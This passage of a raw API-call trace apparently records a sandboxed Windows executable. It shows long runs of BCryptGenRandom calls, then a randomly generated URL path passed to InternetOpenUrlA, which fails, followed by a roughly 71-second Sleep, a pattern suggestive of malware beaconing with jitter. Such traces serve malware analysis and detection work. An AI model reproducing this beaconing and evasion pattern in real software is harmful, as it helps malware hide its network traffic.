pbBuffer=0x46ffd5f) returned 0x0 [0229.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02ba8, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a02ba8) returned 0x0 [0229.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02bbb, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a02bbb) returned 0x0 [0229.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0229.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.971] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.973] GetProcessHeap () returned 0x440000 [0229.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0229.973] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0229.973] lstrcatA (in: lpString1="\x04", lpString2="/t2vdu3bmrznan49i78xuhibt2u0u/hgmd4zemaIglum9h/p25F8do9yU854bnm6rcqurxTl6bm0rkexwvfiexr/1fQnhdyJnt6mQC2908/hiQ5C8vv55kS8ejc84i0uf77htMmb56rdh7q8rnfg6DBe/" | out: lpString1="\x04/t2vdu3bmrznan49i78xuhibt2u0u/hgmd4zemaIglum9h/p25F8do9yU854bnm6rcqurxTl6bm0rkexwvfiexr/1fQnhdyJnt6mQC2908/hiQ5C8vv55kS8ejc84i0uf77htMmb56rdh7q8rnfg6DBe/") returned="\x04/t2vdu3bmrznan49i78xuhibt2u0u/hgmd4zemaIglum9h/p25F8do9yU854bnm6rcqurxTl6bm0rkexwvfiexr/1fQnhdyJnt6mQC2908/hiQ5C8vv55kS8ejc84i0uf77htMmb56rdh7q8rnfg6DBe/" [0229.973] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0229.973] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/t2vdu3bmrznan49i78xuhibt2u0u/hgmd4zemaIglum9h/p25F8do9yU854bnm6rcqurxTl6bm0rkexwvfiexr/1fQnhdyJnt6mQC2908/hiQ5C8vv55kS8ejc84i0uf77htMmb56rdh7q8rnfg6DBe/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0229.973] GetProcessHeap () returned 0x440000 [0229.973] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0229.973] GetProcessHeap () returned 0x440000 [0229.973] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02b50 | out: hHeap=0x440000) returned 1 [0229.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0229.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0229.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0229.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0229.974] Sleep (dwMilliseconds=0x11690) [0230.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0230.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.223] GetProcessHeap () returned 0x440000 [0230.223] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0230.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0230.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 